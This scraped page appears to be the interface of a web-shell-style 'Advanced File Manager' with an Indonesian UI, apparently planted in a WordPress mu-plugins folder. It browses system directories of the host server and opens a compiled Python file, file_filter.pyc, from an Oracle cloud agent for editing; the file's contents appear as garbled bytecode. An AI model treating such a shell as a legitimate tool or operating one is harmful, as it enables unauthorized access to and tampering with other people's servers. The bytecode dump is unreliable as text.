📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
devops
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/devops/models
💾
Free:
45.9 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: file_filter.pyc
a N��f � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ sJ e Zd ZdZdd� Zedd� �Zejdd� �Zdd� Zd d � Z dd� Z d S )� FileFilterzP Attributes to support include/exclude files for triggering build runs. c K s ddi| _ ddi| _d| _dS )aU Initializes a new FileFilter object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param file_paths: The value to assign to the file_paths property of this FileFilter. :type file_paths: list[str] � file_pathsz list[str]� filePathsN)� swagger_types� attribute_map�_file_paths)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/devops/models/file_filter.py�__init__ s ��zFileFilter.__init__c C s | j S )z� Gets the file_paths of this FileFilter. The file paths/glob pattern for files. :return: The file_paths of this FileFilter. :rtype: list[str] �r �r r r r r $ s zFileFilter.file_pathsc C s || _ dS )z� Sets the file_paths of this FileFilter. The file paths/glob pattern for files. :param file_paths: The file_paths of this FileFilter. :type: list[str] Nr )r r r r r r 0 s c C s t | �S �N)r r r r r �__repr__<